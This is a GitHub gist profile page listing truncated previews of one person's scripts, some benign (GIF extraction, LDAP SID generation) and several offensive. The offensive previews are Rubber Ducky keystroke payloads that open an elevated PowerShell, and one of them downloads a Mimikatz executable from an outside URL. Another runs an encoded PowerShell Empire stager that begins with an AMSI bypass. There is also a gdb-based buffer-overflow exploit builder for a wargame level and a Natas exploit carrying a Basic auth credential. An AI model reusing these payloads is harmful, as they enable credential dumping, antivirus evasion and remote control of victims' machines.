Baptiste MOINE Creased

View GitHub Profile
@Creased
Creased / xivo_provd_check.py
Last active April 24, 2017 13:15
Xivo provd check
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#=====================================#
# [+] Title: Xivo provd check #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: [email protected] #
# [+] Twitter: @Creased_ #
#=====================================#
Creased / description.html
Last active May 18, 2017 09:23
Baptiste MOINE's GitLab
<div style="display: block; text-align: center; margin: 0 auto;" id="description">
<a href="https://www.bmoine.fr/" title="Parcours de professionnalisation - Baptiste MOINE" target="_blank">
<img height="180px" src="https://www.bmoine.fr/assets/images/icon.svg" alt="Logo de Baptiste MOINE">
</a>
<p>Welcome to the GitLab instance of <a href="http://www.bmoine.fr" title="Baptiste MOINE">Baptiste MOINE</a>.</p>
<p>On this instance, you will find open source projects that I am working on.</p>
<p>Some projects may not appear on this instance, but you can find all of my projects on <a title="Suivez mes projets opensource sur GitHub" href="https://github.com/Creased">GitHub</a>, <a title="Suivez mes projets opensource sur GitLab" href="https://gitlab.com/Creased">GitLab</a>, <a title="Suivez mes projets opensource sur Docker Hub" href="https://hub.docker.com/r/creased/">Docker Hub</a>, <a title="Suivez mes projets opensource sur IBM Bluemix" hre
#!/usr/bin/env python
# -*-coding:Utf-8 -*
# Magic Packet
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.iface='eth1'
ssh [email protected] # warmup
export TMP=$(mktemp -d)
PATTERN=$(gdb -q -ex 'pattc 250' -ex 'q' | awk -F"'" '{print $2}')
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./level0 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
VDSO=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'vmmap vdso' -ex 'q' | tail -n1 | awk '{print $1}' | grep -Eo '0x[A-Fa-f0-9]+' | sed -r 's/(0x)0/\1/')
MPROTECT=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p mprotect' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+')
READ=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p read' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+')
Creased / mimikatz.duck
Last active August 7, 2017 19:44
Mimikatz Rubber Ducky script
GUI r
DELAY 500
STRING powershell.exe Start-Process powershell.exe -Verb RunAs
ENTER
DELAY 1500
STRING $Payload = Get-Random
ENTER
STRING Start-BitsTransfer -Source https://go.bmoine.fr/mk -Destination C:\$Payload.exe
ENTER
DELAY 1500
Creased / lockscreen.duck
Created August 6, 2017 16:49
Windows Lockscreen prompt Rubber Ducky script
GUI l
Creased / empire.duck
Created August 17, 2017 03:25
Empire Rubber Ducky script
DELAY 1500
GUI r
DELAY 500
STRING powershell.exe Start-Process powershell.exe -Verb RunAs
ENTER
DELAY 1500
STRING powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5
STRING AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACc
STRING AKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZA
STRING AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsA
Creased / generate_ldap_sambasid.sh
Last active October 24, 2017 09:04
LDAP sambaSID
#!/bin/bash
# Usage: ./generate_ldap_sambasid.sh >samba_sid.ldif
# ldapmodify -x -D "cn=admin,dc=domain,dc=tld" -W -f samba_sid.ldif
# Get SID from: net getdomainsid
SID="S-1-5-21-blahblahblah-blahblahblah-blahblahblah"
DOMAIN="dc=domain,dc=tld"
USERS_OU="Peoples"
GROUPS_OU="Groups"
Creased / extractGifs.py
Created November 23, 2017 14:33 — forked from revolunet/extractGifs.py
extract frames from animated gif using python+PIL
import os
from PIL import Image

def extractFrames(inGif, outFolder):
    frame = Image.open(inGif)
    nframes = 0
    while frame:
        frame.save('%s/%s-%s.gif' % (outFolder, os.path.basename(inGif), nframes), 'GIF')
        nframes += 1
Creased / exploit.py
Last active December 4, 2017 21:37
Natas 16
import requests
import re
import sys

# HTTP headers
headers = {
    'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
    'Accept-Language': 'en'
}